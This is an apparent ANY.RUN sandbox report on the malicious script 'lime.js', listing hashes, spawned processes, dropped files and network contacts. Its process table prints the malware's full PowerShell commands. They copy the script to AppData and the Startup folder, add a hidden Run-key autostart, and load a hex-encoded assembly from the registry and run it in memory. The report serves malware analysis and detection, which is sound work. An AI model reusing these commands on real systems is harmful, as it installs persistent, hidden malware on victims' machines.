File name: | lime.js |
Full analysis: | https://app.any.run/tasks/0a4f05ee-7534-4d4c-b97b-9bd4923c6d1e |
Verdict: | Malicious activity |
Analysis date: | August 13, 2019, 16:30:08 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/plain |
File info: | ASCII text, with very long lines, with CRLF line terminators |
MD5: | 1E89379F34AAFD46CE829499E73042AF |
SHA1: | 48316579C2E8902411B45C1A9545F4FAB8E87F0F |
SHA256: | 9674359F0C4DB134EE806D70C2E7E869A3FBA74389D3A1C3E85C61BFD719C54A |
SSDEEP: | 768:TlbXyDfW7QxO0cKtmUpwbT0pEqapHCE0nY:TlbXyDfW7QxOnKEUpwbOQr |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2396 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\lime.js" | C:\Windows\System32\WScript.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
2388 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetEnvironmentVariable('AppData')+'\lime.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Local\Temp\lime.js'));wscript 'C:\Users\admin\AppData\Roaming\lime.js'" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WScript.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3044 | "C:\Windows\system32\wscript.exe" C:\Users\admin\AppData\Roaming\lime.js | C:\Windows\system32\wscript.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 | ||||
4044 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "New-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run' -name 'microsoft' -value 'C:\Users\admin\AppData\Roaming\lime.js' -PropertyType String -Force;" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2160 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "[System.IO.File]::WriteAllText([Environment]::GetFolderPath(7)+'\lime.js',[System.IO.File]::ReadAllText('C:\Users\admin\AppData\Roaming\lime.js'))" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2804 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -noexit -Command "function H2B([string]$s){$H=@();for ($i=0;$i -lt $s.Length;$i+=2){$H+=[Byte]::Parse($s.Substring($i,2),[System.Globalization.NumberStyles]::HexNumber);};return $H;};$_b=(get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'microsoft').microsoft;$_b=$_b.replace('@','0');[byte[]]$_0 = H2B($_b);$_1 = [System.Threading.Thread]::GetDomain().Load($_0);$_1.EntryPoint.invoke($null,$null);" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wscript.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\QB9PK0GYGCE7HL20JL22.temp | — | |
MD5:— | SHA256:— | |||
4044 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RQA81CUN506TIXW0ZT8A.temp | — | |
MD5:— | SHA256:— | |||
2160 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZQCSOVQJ1PACDJLE5D3U.temp | — | |
MD5:— | SHA256:— | |||
2804 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GQRU1ZDFKUHPRN409YIQ.temp | — | |
MD5:— | SHA256:— | |||
4044 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A25A3218432767D044A42DFB20430D13 | SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 | |||
2388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF379e57.TMP | binary | |
MD5:A25A3218432767D044A42DFB20430D13 | SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 | |||
2804 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A25A3218432767D044A42DFB20430D13 | SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 | |||
2804 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF37a349.TMP | binary | |
MD5:A25A3218432767D044A42DFB20430D13 | SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 | |||
2388 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A25A3218432767D044A42DFB20430D13 | SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 | |||
2160 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:A25A3218432767D044A42DFB20430D13 | SHA256:89B8F26BBB4687757C87D5EF3D77646AF493AFFCF68B572BD2D4D5CE07C97BE7 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2804 | powershell.exe | 104.20.209.21:443 | pastebin.com | Cloudflare Inc | US | shared |
2804 | powershell.exe | 193.56.28.134:9505 | — | — | — | malicious |
Domain | IP | Reputation |
---|---|---|
pastebin.com |
| shared |
dns.msftncsi.com |
| shared |